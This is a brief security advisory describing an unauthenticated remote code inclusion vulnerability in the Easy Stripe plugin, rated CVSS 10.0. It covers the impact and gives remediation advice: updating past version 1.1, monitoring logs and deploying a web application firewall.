A critical remote code inclusion vulnerability exists in Scott Paterson's Easy Stripe plugin, which could allow an unauthenticated attacker to execute arbitrary code and achieve complete system compromise.

The software contains a code injection flaw that allows for remote code inclusion. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary code on the target server, requiring no user interaction or prior access.

A successful exploit would grant an attacker complete control over the affected server, leading to potential theft of sensitive customer and payment data, service disruption, and significant reputational damage. The CVSS score of 10.0 reflects the critical nature of this vulnerability, indicating maximum impact with minimal exploitation complexity.

Immediate Action: Administrators must immediately update the Easy Stripe plugin to a version higher than 1.1, or the latest version provided by the vendor, to patch this vulnerability.

Proactive Monitoring: Review web server access logs for unusual requests to plugin-related files. Monitor for unexpected outbound network connections or anomalous process execution on the server.

Compensating Controls: If immediate patching is not feasible, implement a Web Application Firewall (WAF) with rules designed to detect and block remote code inclusion and code injection attack patterns.

Public Exploit Available: Not Specified.

Given the critical severity (CVSS 10.0) and the potential for complete system compromise by an unauthenticated attacker, this vulnerability represents a severe and immediate threat. We strongly recommend that all administrators of systems using the Easy Stripe plugin apply the necessary updates without delay to prevent exploitation.